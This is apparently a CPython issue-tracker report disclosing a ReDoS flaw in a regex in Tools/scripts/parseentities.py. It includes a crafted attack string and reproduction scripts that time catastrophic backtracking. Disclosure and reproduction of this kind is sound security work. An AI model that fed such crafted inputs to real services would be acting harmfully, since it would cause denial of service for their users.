Author yetingli
Recipients yetingli
Date 2020-10-03.15:12:49
Message-id <1601737969.46.0.495788645161.issue41921@roundup.psfhosted.org>
In-reply-to
Content
Hi,

I found that the regex '<!ENTITY +(\w+) +CDATA +"([^"]+)" +-- +((?:.|\n)+?) *-->' can take an extremely long time to match on crafted input.
The vulnerable regex is located in
https://github.com/python/cpython/blob/8d21aa21f2cbc6d50aab3f420bb23be1d081dac4/Tools/scripts/parseentities.py#L18

The ReDoS vulnerability of the regex is mainly due to the sub-pattern ' +((?:.|\n)+?) *'
and can be exploited with the following string
'<!ENTITY a CDATA "a" -- ' + ' ' * 5000

You can run the following code to reproduce the ReDoS:

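# Assumes the root of a CPython checkout is on sys.path so Tools.scripts is importable.
from Tools.scripts.parseentities import parse
from time import perf_counter

for i in range(0, 10000):
    # Unterminated entity declaration (no closing '-->') padded with i * 100 spaces.
    ATTACK = '<!ENTITY a CDATA "a" -- ' + ' ' * i * 100
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    parse(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{LEN}: took {DURATION} seconds!")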
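
If a CPython checkout is not at hand, the slowdown can also be observed with the pattern alone. The following is a minimal sketch, not part of parseentities.py: the names ENTITY_RE and time_search are hypothetical, and the pattern is copied from this report. Because the input has no closing '-->', a backtracking engine has to try many ways of splitting the run of spaces between ' +', the lazy group, and ' *' before giving up, so the time should grow much faster than the input length.

```python
import re
from time import perf_counter

# Pattern copied from this report (hypothetical name, not the module's own).
ENTITY_RE = re.compile(r'<!ENTITY +(\w+) +CDATA +"([^"]+)" +-- +((?:.|\n)+?) *-->')


def time_search(n_spaces):
    """Return the seconds spent searching an unterminated entity
    declaration padded with n_spaces trailing spaces."""
    attack = '<!ENTITY a CDATA "a" -- ' + ' ' * n_spaces
    begin = perf_counter()
    match = ENTITY_RE.search(attack)
    duration = perf_counter() - begin
    # There is no closing '-->', so the search can only fail.
    assert match is None
    return duration


if __name__ == "__main__":
    # Small sizes keep the run short; larger values get slow quickly.
    for n in (50, 100, 200):
        print(f"{n} spaces: {time_search(n):.4f} seconds")
```

The sizes are kept small on purpose; comparing the timings as the number of spaces doubles gives a rough idea of the growth rate without waiting on the 5000-space input.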

Looking forward to your response!

Best,
Yeting Li